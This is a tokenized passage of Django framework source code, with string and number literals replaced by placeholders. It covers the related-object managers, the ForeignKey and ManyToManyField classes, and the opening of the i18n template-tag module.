model . _meta . object_name , obj ) ) <EOL> setattr ( obj , rel_field . name , self . instance ) <EOL> obj . save ( ) <EOL> add . alters_data = True <EOL> def create ( self , ** kwargs ) : <EOL> kwargs [ rel_field . name ] = self . instance <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> return super ( RelatedManager , self . db_manager ( db ) ) . create ( ** kwargs ) <EOL> create . alters_data = True <EOL> def get_or_create ( self , ** kwargs ) : <EOL> kwargs [ rel_field . name ] = self . instance <EOL> db = router . db_for_write ( self . model , instance = self . instance ) <EOL> return super ( RelatedManager , self . db_manager ( db ) ) . get_or_create ( ** kwargs ) <EOL> get_or_create . alters_data = True <EOL> if rel_field . null : <EOL> def remove ( self , * objs ) : <EOL> val = getattr ( self . instance , attname ) <EOL> for obj in objs : <EOL> if getattr ( obj , rel_field . attname ) == val : <EOL> setattr ( obj , rel_field . name , None ) <EOL> obj . save ( ) <EOL> else : <EOL> raise rel_field . rel . to . DoesNotExist ( "<STR_LIT>" % ( obj , self . instance ) ) <EOL> remove . alters_data = True <EOL> def clear ( self ) : <EOL> self . update ( ** { rel_field . name : None } ) <EOL> clear . alters_data = True <EOL> return RelatedManager <EOL> def create_many_related_manager ( superclass , rel ) : <EOL> """<STR_LIT>""" <EOL> class ManyRelatedManager ( superclass ) : <EOL> def __init__ ( self , model = None , query_field_name = None , instance = None , symmetrical = None , <EOL> source_field_name = None , target_field_name = None , reverse = False , <EOL> through = None , prefetch_cache_name = None ) : <EOL> super ( ManyRelatedManager , self ) . __init__ ( ) <EOL> self . model = model <EOL> self . query_field_name = query_field_name <EOL> self . core_filters = { '<STR_LIT>' % query_field_name : instance . _get_pk_val ( ) } <EOL> self . instance = instance <EOL> self . symmetrical = symmetrical <EOL> self . 
source_field_name = source_field_name <EOL> self . target_field_name = target_field_name <EOL> self . reverse = reverse <EOL> self . through = through <EOL> self . prefetch_cache_name = prefetch_cache_name <EOL> self . _fk_val = self . _get_fk_val ( instance , source_field_name ) <EOL> if self . _fk_val is None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( instance , source_field_name ) ) <EOL> if instance . pk is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> instance . __class__ . __name__ ) <EOL> def _get_fk_val ( self , obj , field_name ) : <EOL> """<STR_LIT>""" <EOL> if not self . through : <EOL> return obj . pk <EOL> fk = self . through . _meta . get_field ( field_name ) <EOL> if fk . rel . field_name and fk . rel . field_name != fk . rel . to . _meta . pk . attname : <EOL> attname = fk . rel . get_related_field ( ) . get_attname ( ) <EOL> return fk . get_prep_lookup ( '<STR_LIT>' , getattr ( obj , attname ) ) <EOL> else : <EOL> return obj . pk <EOL> def get_query_set ( self ) : <EOL> try : <EOL> return self . instance . _prefetched_objects_cache [ self . prefetch_cache_name ] <EOL> except ( AttributeError , KeyError ) : <EOL> db = self . _db or router . db_for_read ( self . instance . __class__ , instance = self . instance ) <EOL> return super ( ManyRelatedManager , self ) . get_query_set ( ) . using ( db ) . _next_is_sticky ( ) . filter ( ** self . core_filters ) <EOL> def get_prefetch_query_set ( self , instances ) : <EOL> instance = instances [ <NUM_LIT:0> ] <EOL> from django . db import connections <EOL> db = self . _db or router . db_for_read ( instance . __class__ , instance = instance ) <EOL> query = { '<STR_LIT>' % self . query_field_name : <EOL> set ( obj . _get_pk_val ( ) for obj in instances ) } <EOL> qs = super ( ManyRelatedManager , self ) . get_query_set ( ) . using ( db ) . _next_is_sticky ( ) . filter ( ** query ) <EOL> fk = self . through . _meta . get_field ( self . 
source_field_name ) <EOL> source_col = fk . column <EOL> join_table = self . through . _meta . db_table <EOL> connection = connections [ db ] <EOL> qn = connection . ops . quote_name <EOL> qs = qs . extra ( select = { '<STR_LIT>' : <EOL> '<STR_LIT>' % ( qn ( join_table ) , qn ( source_col ) ) } ) <EOL> select_attname = fk . rel . get_related_field ( ) . get_attname ( ) <EOL> return ( qs , <EOL> attrgetter ( '<STR_LIT>' ) , <EOL> attrgetter ( select_attname ) , <EOL> False , <EOL> self . prefetch_cache_name ) <EOL> if rel . through . _meta . auto_created : <EOL> def add ( self , * objs ) : <EOL> self . _add_items ( self . source_field_name , self . target_field_name , * objs ) <EOL> if self . symmetrical : <EOL> self . _add_items ( self . target_field_name , self . source_field_name , * objs ) <EOL> add . alters_data = True <EOL> def remove ( self , * objs ) : <EOL> self . _remove_items ( self . source_field_name , self . target_field_name , * objs ) <EOL> if self . symmetrical : <EOL> self . _remove_items ( self . target_field_name , self . source_field_name , * objs ) <EOL> remove . alters_data = True <EOL> def clear ( self ) : <EOL> self . _clear_items ( self . source_field_name ) <EOL> if self . symmetrical : <EOL> self . _clear_items ( self . target_field_name ) <EOL> clear . alters_data = True <EOL> def create ( self , ** kwargs ) : <EOL> if not self . through . _meta . auto_created : <EOL> opts = self . through . _meta <EOL> raise AttributeError ( "<STR_LIT>" % ( opts . app_label , opts . object_name ) ) <EOL> db = router . db_for_write ( self . instance . __class__ , instance = self . instance ) <EOL> new_obj = super ( ManyRelatedManager , self . db_manager ( db ) ) . create ( ** kwargs ) <EOL> self . add ( new_obj ) <EOL> return new_obj <EOL> create . alters_data = True <EOL> def get_or_create ( self , ** kwargs ) : <EOL> db = router . db_for_write ( self . instance . __class__ , instance = self . 
instance ) <EOL> obj , created = super ( ManyRelatedManager , self . db_manager ( db ) ) . get_or_create ( ** kwargs ) <EOL> if created : <EOL> self . add ( obj ) <EOL> return obj , created <EOL> get_or_create . alters_data = True <EOL> def _add_items ( self , source_field_name , target_field_name , * objs ) : <EOL> from django . db . models import Model <EOL> if objs : <EOL> new_ids = set ( ) <EOL> for obj in objs : <EOL> if isinstance ( obj , self . model ) : <EOL> if not router . allow_relation ( obj , self . instance ) : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( obj , self . instance . _state . db , obj . _state . db ) ) <EOL> fk_val = self . _get_fk_val ( obj , target_field_name ) <EOL> if fk_val is None : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> ( obj , target_field_name ) ) <EOL> new_ids . add ( self . _get_fk_val ( obj , target_field_name ) ) <EOL> elif isinstance ( obj , Model ) : <EOL> raise TypeError ( "<STR_LIT>" % ( self . model . _meta . object_name , obj ) ) <EOL> else : <EOL> new_ids . add ( obj ) <EOL> db = router . db_for_write ( self . through , instance = self . instance ) <EOL> vals = self . through . _default_manager . using ( db ) . values_list ( target_field_name , flat = True ) <EOL> vals = vals . filter ( ** { <EOL> source_field_name : self . _fk_val , <EOL> '<STR_LIT>' % target_field_name : new_ids , <EOL> } ) <EOL> new_ids = new_ids - set ( vals ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = '<STR_LIT>' , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = new_ids , using = db ) <EOL> self . through . _default_manager . using ( db ) . bulk_create ( [ <EOL> self . through ( ** { <EOL> '<STR_LIT>' % source_field_name : self . _fk_val , <EOL> '<STR_LIT>' % target_field_name : obj_id , <EOL> } ) <EOL> for obj_id in new_ids <EOL> ] ) <EOL> if self . 
reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = '<STR_LIT>' , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = new_ids , using = db ) <EOL> def _remove_items ( self , source_field_name , target_field_name , * objs ) : <EOL> if objs : <EOL> old_ids = set ( ) <EOL> for obj in objs : <EOL> if isinstance ( obj , self . model ) : <EOL> old_ids . add ( self . _get_fk_val ( obj , target_field_name ) ) <EOL> else : <EOL> old_ids . add ( obj ) <EOL> db = router . db_for_write ( self . through , instance = self . instance ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = "<STR_LIT>" , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = old_ids , using = db ) <EOL> self . through . _default_manager . using ( db ) . filter ( ** { <EOL> source_field_name : self . _fk_val , <EOL> '<STR_LIT>' % target_field_name : old_ids <EOL> } ) . delete ( ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = "<STR_LIT>" , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = old_ids , using = db ) <EOL> def _clear_items ( self , source_field_name ) : <EOL> db = router . db_for_write ( self . through , instance = self . instance ) <EOL> if self . reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = "<STR_LIT>" , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = None , using = db ) <EOL> self . through . _default_manager . using ( db ) . filter ( ** { <EOL> source_field_name : self . _fk_val <EOL> } ) . delete ( ) <EOL> if self . 
reverse or source_field_name == self . source_field_name : <EOL> signals . m2m_changed . send ( sender = self . through , action = "<STR_LIT>" , <EOL> instance = self . instance , reverse = self . reverse , <EOL> model = self . model , pk_set = None , using = db ) <EOL> return ManyRelatedManager <EOL> class ManyRelatedObjectsDescriptor ( object ) : <EOL> def __init__ ( self , related ) : <EOL> self . related = related <EOL> @ cached_property <EOL> def related_manager_cls ( self ) : <EOL> return create_many_related_manager ( <EOL> self . related . model . _default_manager . __class__ , <EOL> self . related . field . rel <EOL> ) <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> rel_model = self . related . model <EOL> manager = self . related_manager_cls ( <EOL> model = rel_model , <EOL> query_field_name = self . related . field . name , <EOL> prefetch_cache_name = self . related . field . related_query_name ( ) , <EOL> instance = instance , <EOL> symmetrical = False , <EOL> source_field_name = self . related . field . m2m_reverse_field_name ( ) , <EOL> target_field_name = self . related . field . m2m_field_name ( ) , <EOL> reverse = True , <EOL> through = self . related . field . rel . through , <EOL> ) <EOL> return manager <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> if not self . related . field . rel . through . _meta . auto_created : <EOL> opts = self . related . field . rel . through . _meta <EOL> raise AttributeError ( "<STR_LIT>" % ( opts . app_label , opts . object_name ) ) <EOL> manager = self . __get__ ( instance ) <EOL> manager . clear ( ) <EOL> manager . add ( * value ) <EOL> class ReverseManyRelatedObjectsDescriptor ( object ) : <EOL> def __init__ ( self , m2m_field ) : <EOL> self . field = m2m_field <EOL> @ property <EOL> def through ( self ) : <EOL> return self . field . rel . 
through <EOL> @ cached_property <EOL> def related_manager_cls ( self ) : <EOL> return create_many_related_manager ( <EOL> self . field . rel . to . _default_manager . __class__ , <EOL> self . field . rel <EOL> ) <EOL> def __get__ ( self , instance , instance_type = None ) : <EOL> if instance is None : <EOL> return self <EOL> manager = self . related_manager_cls ( <EOL> model = self . field . rel . to , <EOL> query_field_name = self . field . related_query_name ( ) , <EOL> prefetch_cache_name = self . field . name , <EOL> instance = instance , <EOL> symmetrical = self . field . rel . symmetrical , <EOL> source_field_name = self . field . m2m_field_name ( ) , <EOL> target_field_name = self . field . m2m_reverse_field_name ( ) , <EOL> reverse = False , <EOL> through = self . field . rel . through , <EOL> ) <EOL> return manager <EOL> def __set__ ( self , instance , value ) : <EOL> if instance is None : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> if not self . field . rel . through . _meta . auto_created : <EOL> opts = self . field . rel . through . _meta <EOL> raise AttributeError ( "<STR_LIT>" % ( opts . app_label , opts . object_name ) ) <EOL> manager = self . __get__ ( instance ) <EOL> manager . clear ( ) <EOL> manager . add ( * value ) <EOL> class ManyToOneRel ( object ) : <EOL> def __init__ ( self , to , field_name , related_name = None , limit_choices_to = None , <EOL> parent_link = False , on_delete = None ) : <EOL> try : <EOL> to . _meta <EOL> except AttributeError : <EOL> assert isinstance ( to , six . string_types ) , "<STR_LIT>" % RECURSIVE_RELATIONSHIP_CONSTANT <EOL> self . to , self . field_name = to , field_name <EOL> self . related_name = related_name <EOL> if limit_choices_to is None : <EOL> limit_choices_to = { } <EOL> self . limit_choices_to = limit_choices_to <EOL> self . multiple = True <EOL> self . parent_link = parent_link <EOL> self . on_delete = on_delete <EOL> def is_hidden ( self ) : <EOL> "<STR_LIT>" <EOL> return self . 
related_name and self . related_name [ - <NUM_LIT:1> ] == '<STR_LIT:+>' <EOL> def get_related_field ( self ) : <EOL> """<STR_LIT>""" <EOL> data = self . to . _meta . get_field_by_name ( self . field_name ) <EOL> if not data [ <NUM_LIT:2> ] : <EOL> raise FieldDoesNotExist ( "<STR_LIT>" % <EOL> self . field_name ) <EOL> return data [ <NUM_LIT:0> ] <EOL> class OneToOneRel ( ManyToOneRel ) : <EOL> def __init__ ( self , to , field_name , related_name = None , limit_choices_to = None , <EOL> parent_link = False , on_delete = None ) : <EOL> super ( OneToOneRel , self ) . __init__ ( to , field_name , <EOL> related_name = related_name , limit_choices_to = limit_choices_to , <EOL> parent_link = parent_link , on_delete = on_delete <EOL> ) <EOL> self . multiple = False <EOL> class ManyToManyRel ( object ) : <EOL> def __init__ ( self , to , related_name = None , limit_choices_to = None , <EOL> symmetrical = True , through = None ) : <EOL> self . to = to <EOL> self . related_name = related_name <EOL> if limit_choices_to is None : <EOL> limit_choices_to = { } <EOL> self . limit_choices_to = limit_choices_to <EOL> self . symmetrical = symmetrical <EOL> self . multiple = True <EOL> self . through = through <EOL> def is_hidden ( self ) : <EOL> "<STR_LIT>" <EOL> return self . related_name and self . related_name [ - <NUM_LIT:1> ] == '<STR_LIT:+>' <EOL> def get_related_field ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . to . _meta . pk <EOL> class ForeignKey ( RelatedField , Field ) : <EOL> empty_strings_allowed = False <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) <EOL> } <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , to , to_field = None , rel_class = ManyToOneRel , ** kwargs ) : <EOL> try : <EOL> to_name = to . _meta . object_name . lower ( ) <EOL> except AttributeError : <EOL> assert isinstance ( to , six . string_types ) , "<STR_LIT>" % ( self . __class__ . 
__name__ , to , RECURSIVE_RELATIONSHIP_CONSTANT ) <EOL> else : <EOL> assert not to . _meta . abstract , "<STR_LIT>" % ( self . __class__ . __name__ , to . _meta . object_name ) <EOL> to_field = to_field or ( to . _meta . pk and to . _meta . pk . name ) <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , None ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> kwargs [ '<STR_LIT>' ] = rel_class ( to , to_field , <EOL> related_name = kwargs . pop ( '<STR_LIT:related_name>' , None ) , <EOL> limit_choices_to = kwargs . pop ( '<STR_LIT>' , None ) , <EOL> parent_link = kwargs . pop ( '<STR_LIT>' , False ) , <EOL> on_delete = kwargs . pop ( '<STR_LIT>' , CASCADE ) , <EOL> ) <EOL> Field . __init__ ( self , ** kwargs ) <EOL> def validate ( self , value , model_instance ) : <EOL> if self . rel . parent_link : <EOL> return <EOL> super ( ForeignKey , self ) . validate ( value , model_instance ) <EOL> if value is None : <EOL> return <EOL> using = router . db_for_read ( model_instance . __class__ , instance = model_instance ) <EOL> qs = self . rel . to . _default_manager . using ( using ) . filter ( <EOL> ** { self . rel . field_name : value } <EOL> ) <EOL> qs = qs . complex_filter ( self . rel . limit_choices_to ) <EOL> if not qs . exists ( ) : <EOL> raise exceptions . ValidationError ( self . error_messages [ '<STR_LIT>' ] % { <EOL> '<STR_LIT>' : self . rel . to . _meta . verbose_name , '<STR_LIT>' : value } ) <EOL> def get_attname ( self ) : <EOL> return '<STR_LIT>' % self . name <EOL> def get_validator_unique_lookup_type ( self ) : <EOL> return '<STR_LIT>' % ( self . name , self . rel . get_related_field ( ) . name ) <EOL> def get_default ( self ) : <EOL> "<STR_LIT>" <EOL> field_default = super ( ForeignKey , self ) . get_default ( ) <EOL> if isinstance ( field_default , self . rel . to ) : <EOL> return getattr ( field_default , self . rel . get_related_field ( ) . 
attname ) <EOL> return field_default <EOL> def get_db_prep_save ( self , value , connection ) : <EOL> if value == '<STR_LIT>' or value == None : <EOL> return None <EOL> else : <EOL> return self . rel . get_related_field ( ) . get_db_prep_save ( value , <EOL> connection = connection ) <EOL> def value_to_string ( self , obj ) : <EOL> if not obj : <EOL> if not self . blank and self . choices : <EOL> choice_list = self . get_choices_default ( ) <EOL> if len ( choice_list ) == <NUM_LIT:2> : <EOL> return smart_text ( choice_list [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] ) <EOL> return Field . value_to_string ( self , obj ) <EOL> def contribute_to_class ( self , cls , name ) : <EOL> super ( ForeignKey , self ) . contribute_to_class ( cls , name ) <EOL> setattr ( cls , self . name , ReverseSingleRelatedObjectDescriptor ( self ) ) <EOL> if isinstance ( self . rel . to , six . string_types ) : <EOL> target = self . rel . to <EOL> else : <EOL> target = self . rel . to . _meta . db_table <EOL> cls . _meta . duplicate_targets [ self . column ] = ( target , "<STR_LIT>" ) <EOL> def contribute_to_related_class ( self , cls , related ) : <EOL> if not self . rel . is_hidden ( ) and not related . model . _meta . swapped : <EOL> setattr ( cls , related . get_accessor_name ( ) , ForeignRelatedObjectsDescriptor ( related ) ) <EOL> if self . rel . limit_choices_to : <EOL> cls . _meta . related_fkey_lookups . append ( self . rel . limit_choices_to ) <EOL> if self . rel . field_name is None : <EOL> self . rel . field_name = cls . _meta . pk . name <EOL> def formfield ( self , ** kwargs ) : <EOL> db = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if isinstance ( self . rel . to , six . string_types ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( self . name , self . rel . to ) ) <EOL> defaults = { <EOL> '<STR_LIT>' : forms . ModelChoiceField , <EOL> '<STR_LIT>' : self . rel . to . _default_manager . using ( db ) . complex_filter ( self . rel . 
limit_choices_to ) , <EOL> '<STR_LIT>' : self . rel . field_name , <EOL> } <EOL> defaults . update ( kwargs ) <EOL> return super ( ForeignKey , self ) . formfield ( ** defaults ) <EOL> def db_type ( self , connection ) : <EOL> rel_field = self . rel . get_related_field ( ) <EOL> if ( isinstance ( rel_field , AutoField ) or <EOL> ( not connection . features . related_fields_match_type and <EOL> isinstance ( rel_field , ( PositiveIntegerField , <EOL> PositiveSmallIntegerField ) ) ) ) : <EOL> return IntegerField ( ) . db_type ( connection = connection ) <EOL> return rel_field . db_type ( connection = connection ) <EOL> class OneToOneField ( ForeignKey ) : <EOL> """<STR_LIT>""" <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , to , to_field = None , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = True <EOL> super ( OneToOneField , self ) . __init__ ( to , to_field , OneToOneRel , ** kwargs ) <EOL> def contribute_to_related_class ( self , cls , related ) : <EOL> setattr ( cls , related . get_accessor_name ( ) , <EOL> SingleRelatedObjectDescriptor ( related ) ) <EOL> def formfield ( self , ** kwargs ) : <EOL> if self . rel . parent_link : <EOL> return None <EOL> return super ( OneToOneField , self ) . formfield ( ** kwargs ) <EOL> def save_form_data ( self , instance , data ) : <EOL> if isinstance ( data , self . rel . to ) : <EOL> setattr ( instance , self . name , data ) <EOL> else : <EOL> setattr ( instance , self . attname , data ) <EOL> def create_many_to_many_intermediary_model ( field , klass ) : <EOL> from django . db import models <EOL> managed = True <EOL> if isinstance ( field . rel . to , six . string_types ) and field . rel . to != RECURSIVE_RELATIONSHIP_CONSTANT : <EOL> to_model = field . rel . to <EOL> to = to_model . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> def set_managed ( field , model , cls ) : <EOL> field . rel . through . _meta . managed = model . _meta . managed or cls . _meta . 
managed <EOL> add_lazy_relation ( klass , field , to_model , set_managed ) <EOL> elif isinstance ( field . rel . to , six . string_types ) : <EOL> to = klass . _meta . object_name <EOL> to_model = klass <EOL> managed = klass . _meta . managed <EOL> else : <EOL> to = field . rel . to . _meta . object_name <EOL> to_model = field . rel . to <EOL> managed = klass . _meta . managed or to_model . _meta . managed <EOL> name = '<STR_LIT>' % ( klass . _meta . object_name , field . name ) <EOL> if field . rel . to == RECURSIVE_RELATIONSHIP_CONSTANT or to == klass . _meta . object_name : <EOL> from_ = '<STR_LIT>' % to . lower ( ) <EOL> to = '<STR_LIT>' % to . lower ( ) <EOL> else : <EOL> from_ = klass . _meta . object_name . lower ( ) <EOL> to = to . lower ( ) <EOL> meta = type ( '<STR_LIT:Meta>' , ( object , ) , { <EOL> '<STR_LIT>' : field . _get_m2m_db_table ( klass . _meta ) , <EOL> '<STR_LIT>' : managed , <EOL> '<STR_LIT>' : klass , <EOL> '<STR_LIT>' : klass . _meta . app_label , <EOL> '<STR_LIT>' : klass . _meta . db_tablespace , <EOL> '<STR_LIT>' : ( from_ , to ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % { '<STR_LIT>' : from_ , '<STR_LIT:to>' : to } , <EOL> '<STR_LIT>' : '<STR_LIT>' % { '<STR_LIT>' : from_ , '<STR_LIT:to>' : to } , <EOL> } ) <EOL> return type ( name , ( models . Model , ) , { <EOL> '<STR_LIT:Meta>' : meta , <EOL> '<STR_LIT>' : klass . __module__ , <EOL> from_ : models . ForeignKey ( klass , related_name = '<STR_LIT>' % name , db_tablespace = field . db_tablespace ) , <EOL> to : models . ForeignKey ( to_model , related_name = '<STR_LIT>' % name , db_tablespace = field . db_tablespace ) <EOL> } ) <EOL> class ManyToManyField ( RelatedField , Field ) : <EOL> description = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , to , ** kwargs ) : <EOL> try : <EOL> assert not to . _meta . abstract , "<STR_LIT>" % ( self . __class__ . __name__ , to . _meta . object_name ) <EOL> except AttributeError : <EOL> assert isinstance ( to , six . 
string_types ) , "<STR_LIT>" % ( self . __class__ . __name__ , to , RECURSIVE_RELATIONSHIP_CONSTANT ) <EOL> to = str ( to ) <EOL> kwargs [ '<STR_LIT>' ] = kwargs . get ( '<STR_LIT>' , None ) <EOL> kwargs [ '<STR_LIT>' ] = ManyToManyRel ( to , <EOL> related_name = kwargs . pop ( '<STR_LIT:related_name>' , None ) , <EOL> limit_choices_to = kwargs . pop ( '<STR_LIT>' , None ) , <EOL> symmetrical = kwargs . pop ( '<STR_LIT>' , to == RECURSIVE_RELATIONSHIP_CONSTANT ) , <EOL> through = kwargs . pop ( '<STR_LIT>' , None ) ) <EOL> self . db_table = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if kwargs [ '<STR_LIT>' ] . through is not None : <EOL> assert self . db_table is None , "<STR_LIT>" <EOL> Field . __init__ ( self , ** kwargs ) <EOL> msg = _ ( '<STR_LIT>' ) <EOL> self . help_text = string_concat ( self . help_text , '<STR_LIT:U+0020>' , msg ) <EOL> def get_choices_default ( self ) : <EOL> return Field . get_choices ( self , include_blank = False ) <EOL> def _get_m2m_db_table ( self , opts ) : <EOL> "<STR_LIT>" <EOL> if self . rel . through is not None : <EOL> return self . rel . through . _meta . db_table <EOL> elif self . db_table : <EOL> return self . db_table <EOL> else : <EOL> return util . truncate_name ( '<STR_LIT>' % ( opts . db_table , self . name ) , <EOL> connection . ops . max_name_length ( ) ) <EOL> def _get_m2m_attr ( self , related , attr ) : <EOL> "<STR_LIT>" <EOL> cache_attr = '<STR_LIT>' % attr <EOL> if hasattr ( self , cache_attr ) : <EOL> return getattr ( self , cache_attr ) <EOL> for f in self . rel . through . _meta . fields : <EOL> if hasattr ( f , '<STR_LIT>' ) and f . rel and f . rel . to == related . 
model : <EOL> setattr ( self , cache_attr , getattr ( f , attr ) ) <EOL> return getattr ( self , cache_attr ) <EOL> def _get_m2m_reverse_attr ( self , related , attr ) : <EOL> "<STR_LIT>" <EOL> cache_attr = '<STR_LIT>' % attr <EOL> if hasattr ( self , cache_attr ) : <EOL> return getattr ( self , cache_attr ) <EOL> found = False <EOL> for f in self . rel . through . _meta . fields : <EOL> if hasattr ( f , '<STR_LIT>' ) and f . rel and f . rel . to == related . parent_model : <EOL> if related . model == related . parent_model : <EOL> if found : <EOL> setattr ( self , cache_attr , getattr ( f , attr ) ) <EOL> break <EOL> else : <EOL> found = True <EOL> else : <EOL> setattr ( self , cache_attr , getattr ( f , attr ) ) <EOL> break <EOL> return getattr ( self , cache_attr ) <EOL> def value_to_string ( self , obj ) : <EOL> data = '<STR_LIT>' <EOL> if obj : <EOL> qs = getattr ( obj , self . name ) . all ( ) <EOL> data = [ instance . _get_pk_val ( ) for instance in qs ] <EOL> else : <EOL> if not self . blank : <EOL> choices_list = self . get_choices_default ( ) <EOL> if len ( choices_list ) == <NUM_LIT:1> : <EOL> data = [ choices_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] <EOL> return smart_text ( data ) <EOL> def contribute_to_class ( self , cls , name ) : <EOL> if self . rel . symmetrical and ( self . rel . to == "<STR_LIT>" or self . rel . to == cls . _meta . object_name ) : <EOL> self . rel . related_name = "<STR_LIT>" % name <EOL> super ( ManyToManyField , self ) . contribute_to_class ( cls , name ) <EOL> if not self . rel . through and not cls . _meta . abstract and not cls . _meta . swapped : <EOL> self . rel . through = create_many_to_many_intermediary_model ( self , cls ) <EOL> setattr ( cls , self . name , ReverseManyRelatedObjectsDescriptor ( self ) ) <EOL> self . m2m_db_table = curry ( self . _get_m2m_db_table , cls . _meta ) <EOL> if isinstance ( self . rel . through , six . string_types ) : <EOL> def resolve_through_model ( field , model , cls ) : <EOL> field . 
rel . through = model <EOL> add_lazy_relation ( cls , self , self . rel . through , resolve_through_model ) <EOL> if isinstance ( self . rel . to , six . string_types ) : <EOL> target = self . rel . to <EOL> else : <EOL> target = self . rel . to . _meta . db_table <EOL> cls . _meta . duplicate_targets [ self . column ] = ( target , "<STR_LIT>" ) <EOL> def contribute_to_related_class ( self , cls , related ) : <EOL> if not self . rel . is_hidden ( ) and not related . model . _meta . swapped : <EOL> setattr ( cls , related . get_accessor_name ( ) , ManyRelatedObjectsDescriptor ( related ) ) <EOL> self . m2m_column_name = curry ( self . _get_m2m_attr , related , '<STR_LIT>' ) <EOL> self . m2m_reverse_name = curry ( self . _get_m2m_reverse_attr , related , '<STR_LIT>' ) <EOL> self . m2m_field_name = curry ( self . _get_m2m_attr , related , '<STR_LIT:name>' ) <EOL> self . m2m_reverse_field_name = curry ( self . _get_m2m_reverse_attr , related , '<STR_LIT:name>' ) <EOL> get_m2m_rel = curry ( self . _get_m2m_attr , related , '<STR_LIT>' ) <EOL> self . m2m_target_field_name = lambda : get_m2m_rel ( ) . field_name <EOL> get_m2m_reverse_rel = curry ( self . _get_m2m_reverse_attr , related , '<STR_LIT>' ) <EOL> self . m2m_reverse_target_field_name = lambda : get_m2m_reverse_rel ( ) . field_name <EOL> def set_attributes_from_rel ( self ) : <EOL> pass <EOL> def value_from_object ( self , obj ) : <EOL> "<STR_LIT>" <EOL> return getattr ( obj , self . attname ) . all ( ) <EOL> def save_form_data ( self , instance , data ) : <EOL> setattr ( instance , self . attname , data ) <EOL> def formfield ( self , ** kwargs ) : <EOL> db = kwargs . pop ( '<STR_LIT>' , None ) <EOL> defaults = { <EOL> '<STR_LIT>' : forms . ModelMultipleChoiceField , <EOL> '<STR_LIT>' : self . rel . to . _default_manager . using ( db ) . complex_filter ( self . rel . limit_choices_to ) <EOL> } <EOL> defaults . update ( kwargs ) <EOL> if defaults . 
get ( '<STR_LIT>' ) is not None : <EOL> initial = defaults [ '<STR_LIT>' ] <EOL> if callable ( initial ) : <EOL> initial = initial ( ) <EOL> defaults [ '<STR_LIT>' ] = [ i . _get_pk_val ( ) for i in initial ] <EOL> return super ( ManyToManyField , self ) . formfield ( ** defaults ) <EOL> def db_type ( self , connection ) : <EOL> return None </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> from django . template import ( Node , Variable , TemplateSyntaxError , <EOL> TokenParser , Library , TOKEN_TEXT , TOKEN_VAR ) <EOL> from django . template . base import _render_value_in_context <EOL> from django . template . defaulttags import token_kwargs <EOL> from django . utils import six <EOL> from django . utils import translation <EOL> register = Library ( ) <EOL> class GetAvailableLanguagesNode ( Node ) : <EOL> def __init__ ( self , variable ) : <EOL> self . variable = variable <EOL> def render ( self , context ) : <EOL> from django . conf import settings <EOL> context [ self . variable ] = [ ( k , translation . ugettext ( v ) ) for k , v in settings . LANGUAGES ] <EOL> return '<STR_LIT>' <EOL> class GetLanguageInfoNode ( Node ) : <EOL> def __init__ ( self , lang_code , variable ) : <EOL> self . lang_code = Variable ( lang_code ) <EOL> self . variable = variable <EOL> def render ( self , context ) : <EOL> lang_code = self . lang_code . resolve ( context ) <EOL> context [ self . variable ] = translation . get_language_info ( lang_code ) <EOL> return '<STR_LIT>' <EOL> class GetLanguageInfoListNode ( Node ) : <EOL> def __init__ ( self , languages , variable ) : <EOL> self . languages = Variable ( languages ) <EOL> self . variable = variable <EOL> def get_language_info ( self , language ) : <EOL> if len ( language [ <NUM_LIT:0> ] ) > <NUM_LIT:1> : <EOL> return translation . get_language_info ( language [ <NUM_LIT:0> ] ) <EOL> else : <EOL> return translation . get_language_info ( str ( language ) ) <EOL> def render ( self , context ) : <EOL> langs = self . languages . resolve ( context ) <EOL> context [ self . variable ] = [ self . get_language_info ( lang ) for lang in langs ] <EOL> return '<STR_LIT>' <EOL> class GetCurrentLanguageNode ( Node ) : <EOL> def __init__ ( self , variable ) : <EOL> self . variable = variable <EOL> def render ( self , context ) : <EOL> context [ self . 
